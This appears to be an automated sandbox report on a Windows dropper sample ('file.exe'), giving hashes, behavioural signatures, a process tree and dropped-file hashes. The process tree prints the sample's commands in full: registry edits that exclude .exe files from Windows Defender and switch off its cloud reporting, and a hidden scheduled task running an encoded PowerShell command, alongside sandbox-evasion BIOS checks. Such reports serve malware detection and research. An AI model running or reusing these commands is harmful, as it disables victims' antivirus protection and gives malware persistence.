Analysis
-
max time kernel
269s -
max time network
336s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
04-12-2022 03:07
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
e4efd84214889d40f8eccdf9d8584585
-
SHA1
ce21b9be73be7d4f0091cfdae53e5f0eb42a9b2f
-
SHA256
9268b48a46002670bf6b18707599367dc38f79a88693d14d6403a7d11b337f84
-
SHA512
a45d91d0e4a6b0240f52cf05ff059133fb3ecd111802a5be2fbb8a173320e4eff118a903cc0b25db14f0cb0d5adba0da466b67d5e0475382a2760848acbf565f
-
SSDEEP
98304:91OSghrTm4CgZoiK2Kltghg6kWkgN+RQKVE4esblIO5iw7B2GzpmUs8bnUvoCXcY:91OO4dKLicZxq4zR12tAnaoIrb/w0Fn
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 588 Install.exe 784 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 556 file.exe 588 Install.exe 588 Install.exe 588 Install.exe 588 Install.exe 784 Install.exe 784 Install.exe 784 Install.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1700 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 556 wrote to memory of 588 556 file.exe 28 PID 556 wrote to memory of 588 556 file.exe 28 PID 556 wrote to memory of 588 556 file.exe 28 PID 556 wrote to memory of 588 556 file.exe 28 PID 556 wrote to memory of 588 556 file.exe 28 PID 556 wrote to memory of 588 556 file.exe 28 PID 556 wrote to memory of 588 556 file.exe 28 PID 588 wrote to memory of 784 588 Install.exe 29 PID 588 wrote to memory of 784 588 Install.exe 29 PID 588 wrote to memory of 784 588 Install.exe 29 PID 588 wrote to memory of 784 588 Install.exe 29 PID 588 wrote to memory of 784 588 Install.exe 29 PID 588 wrote to memory of 784 588 Install.exe 29 PID 588 wrote to memory of 784 588 Install.exe 29 PID 784 wrote to memory of 1900 784 Install.exe 31 PID 784 wrote to memory of 1900 784 Install.exe 31 PID 784 wrote to memory of 1900 784 Install.exe 31 PID 784 wrote to memory of 1900 784 Install.exe 31 PID 784 wrote to memory of 1900 784 Install.exe 31 PID 784 wrote to memory of 1900 784 Install.exe 31 PID 784 wrote to memory of 1900 784 Install.exe 31 PID 784 wrote to memory of 884 784 Install.exe 33 PID 784 wrote to memory of 884 784 Install.exe 33 PID 784 wrote to memory of 884 784 Install.exe 33 PID 784 wrote to memory of 884 784 Install.exe 33 PID 784 wrote to memory of 884 784 Install.exe 33 PID 784 wrote to memory of 884 784 Install.exe 33 PID 784 wrote to memory of 884 784 Install.exe 33 PID 1900 wrote to memory of 1460 1900 forfiles.exe 35 PID 1900 wrote to memory of 1460 1900 forfiles.exe 35 PID 1900 wrote to memory of 1460 1900 forfiles.exe 35 PID 1900 wrote to memory of 1460 1900 forfiles.exe 35 PID 1900 wrote to memory of 1460 1900 forfiles.exe 35 PID 1900 wrote to memory of 1460 1900 forfiles.exe 35 PID 1900 wrote to memory of 1460 1900 forfiles.exe 35 PID 1460 wrote to memory of 612 1460 cmd.exe 36 PID 1460 wrote to memory of 612 1460 cmd.exe 36 PID 1460 wrote to memory of 612 1460 cmd.exe 36 PID 1460 wrote to memory of 612 1460 cmd.exe 36 PID 1460 wrote to memory of 612 1460 cmd.exe 36 PID 1460 wrote to memory of 612 1460 cmd.exe 36 PID 1460 wrote to memory of 612 1460 cmd.exe 36 PID 884 wrote to memory of 1572 884 forfiles.exe 37 PID 884 wrote to memory of 1572 884 forfiles.exe 37 PID 884 wrote to memory of 1572 884 forfiles.exe 37 PID 884 wrote to memory of 1572 884 forfiles.exe 37 PID 884 wrote to memory of 1572 884 forfiles.exe 37 PID 884 wrote to memory of 1572 884 forfiles.exe 37 PID 884 wrote to memory of 1572 884 forfiles.exe 37 PID 1572 wrote to memory of 1200 1572 cmd.exe 38 PID 1572 wrote to memory of 1200 1572 cmd.exe 38 PID 1572 wrote to memory of 1200 1572 cmd.exe 38 PID 1572 wrote to memory of 1200 1572 cmd.exe 38 PID 1572 wrote to memory of 1200 1572 cmd.exe 38 PID 1572 wrote to memory of 1200 1572 cmd.exe 38 PID 1572 wrote to memory of 1200 1572 cmd.exe 38 PID 1460 wrote to memory of 1852 1460 cmd.exe 39 PID 1460 wrote to memory of 1852 1460 cmd.exe 39 PID 1460 wrote to memory of 1852 1460 cmd.exe 39 PID 1460 wrote to memory of 1852 1460 cmd.exe 39 PID 1460 wrote to memory of 1852 1460 cmd.exe 39 PID 1460 wrote to memory of 1852 1460 cmd.exe 39 PID 1460 wrote to memory of 1852 1460 cmd.exe 39 PID 1572 wrote to memory of 932 1572 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Users\Admin\AppData\Local\Temp\7zSB617.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Users\Admin\AppData\Local\Temp\7zS1391.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:612
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1852
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1200
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:932
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNOLRWZLm" /SC once /ST 02:42:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNOLRWZLm"4⤵PID:1988
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {EFF3EBA5-195B-49F4-833F-2B17B48DD987} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]1⤵PID:1752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
PID:2036
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.8MB
MD5d57fcb1f7217abdc3bc9594d72b069e2
SHA19bb541769d84def773ce4e51c31bd056ba6c213d
SHA256ede74804494d3193db79cc6f078999f81a1654a17eb734c470318e3d19bce386
SHA51277ae8eecb30db62fafe71dcbd6a3f6d6971a7d2abae9d34991d8f61aba5f25a0daf70cc908a4362953677a04a0268773c58cf58c3332dbd3abb96bbb795e660a
-
Filesize
6.8MB
MD5d57fcb1f7217abdc3bc9594d72b069e2
SHA19bb541769d84def773ce4e51c31bd056ba6c213d
SHA256ede74804494d3193db79cc6f078999f81a1654a17eb734c470318e3d19bce386
SHA51277ae8eecb30db62fafe71dcbd6a3f6d6971a7d2abae9d34991d8f61aba5f25a0daf70cc908a4362953677a04a0268773c58cf58c3332dbd3abb96bbb795e660a
-
Filesize
6.3MB
MD540e955dc9d482dd6cc936ee22987daab
SHA1b006140e3367adf14a6451997c533b3e402626c1
SHA2561876825fafd8bb8c37a783889b14ac641f2f51ce31cb682c84c0d19a850573ec
SHA5127d56b0ce7c6ced797c32ae9706bdd32b0ea69a5f75f477a1f630d3ac93c6b5bb20b38e5532244a54466ec3456f8a0b6dd5de16f91f04f4bb3fc7860633ca1c11
-
Filesize
6.3MB
MD540e955dc9d482dd6cc936ee22987daab
SHA1b006140e3367adf14a6451997c533b3e402626c1
SHA2561876825fafd8bb8c37a783889b14ac641f2f51ce31cb682c84c0d19a850573ec
SHA5127d56b0ce7c6ced797c32ae9706bdd32b0ea69a5f75f477a1f630d3ac93c6b5bb20b38e5532244a54466ec3456f8a0b6dd5de16f91f04f4bb3fc7860633ca1c11
-
Filesize
6.8MB
MD5d57fcb1f7217abdc3bc9594d72b069e2
SHA19bb541769d84def773ce4e51c31bd056ba6c213d
SHA256ede74804494d3193db79cc6f078999f81a1654a17eb734c470318e3d19bce386
SHA51277ae8eecb30db62fafe71dcbd6a3f6d6971a7d2abae9d34991d8f61aba5f25a0daf70cc908a4362953677a04a0268773c58cf58c3332dbd3abb96bbb795e660a
-
Filesize
6.8MB
MD5d57fcb1f7217abdc3bc9594d72b069e2
SHA19bb541769d84def773ce4e51c31bd056ba6c213d
SHA256ede74804494d3193db79cc6f078999f81a1654a17eb734c470318e3d19bce386
SHA51277ae8eecb30db62fafe71dcbd6a3f6d6971a7d2abae9d34991d8f61aba5f25a0daf70cc908a4362953677a04a0268773c58cf58c3332dbd3abb96bbb795e660a
-
Filesize
6.8MB
MD5d57fcb1f7217abdc3bc9594d72b069e2
SHA19bb541769d84def773ce4e51c31bd056ba6c213d
SHA256ede74804494d3193db79cc6f078999f81a1654a17eb734c470318e3d19bce386
SHA51277ae8eecb30db62fafe71dcbd6a3f6d6971a7d2abae9d34991d8f61aba5f25a0daf70cc908a4362953677a04a0268773c58cf58c3332dbd3abb96bbb795e660a
-
Filesize
6.8MB
MD5d57fcb1f7217abdc3bc9594d72b069e2
SHA19bb541769d84def773ce4e51c31bd056ba6c213d
SHA256ede74804494d3193db79cc6f078999f81a1654a17eb734c470318e3d19bce386
SHA51277ae8eecb30db62fafe71dcbd6a3f6d6971a7d2abae9d34991d8f61aba5f25a0daf70cc908a4362953677a04a0268773c58cf58c3332dbd3abb96bbb795e660a
-
Filesize
6.3MB
MD540e955dc9d482dd6cc936ee22987daab
SHA1b006140e3367adf14a6451997c533b3e402626c1
SHA2561876825fafd8bb8c37a783889b14ac641f2f51ce31cb682c84c0d19a850573ec
SHA5127d56b0ce7c6ced797c32ae9706bdd32b0ea69a5f75f477a1f630d3ac93c6b5bb20b38e5532244a54466ec3456f8a0b6dd5de16f91f04f4bb3fc7860633ca1c11
-
Filesize
6.3MB
MD540e955dc9d482dd6cc936ee22987daab
SHA1b006140e3367adf14a6451997c533b3e402626c1
SHA2561876825fafd8bb8c37a783889b14ac641f2f51ce31cb682c84c0d19a850573ec
SHA5127d56b0ce7c6ced797c32ae9706bdd32b0ea69a5f75f477a1f630d3ac93c6b5bb20b38e5532244a54466ec3456f8a0b6dd5de16f91f04f4bb3fc7860633ca1c11
-
Filesize
6.3MB
MD540e955dc9d482dd6cc936ee22987daab
SHA1b006140e3367adf14a6451997c533b3e402626c1
SHA2561876825fafd8bb8c37a783889b14ac641f2f51ce31cb682c84c0d19a850573ec
SHA5127d56b0ce7c6ced797c32ae9706bdd32b0ea69a5f75f477a1f630d3ac93c6b5bb20b38e5532244a54466ec3456f8a0b6dd5de16f91f04f4bb3fc7860633ca1c11
-
Filesize
6.3MB
MD540e955dc9d482dd6cc936ee22987daab
SHA1b006140e3367adf14a6451997c533b3e402626c1
SHA2561876825fafd8bb8c37a783889b14ac641f2f51ce31cb682c84c0d19a850573ec
SHA5127d56b0ce7c6ced797c32ae9706bdd32b0ea69a5f75f477a1f630d3ac93c6b5bb20b38e5532244a54466ec3456f8a0b6dd5de16f91f04f4bb3fc7860633ca1c11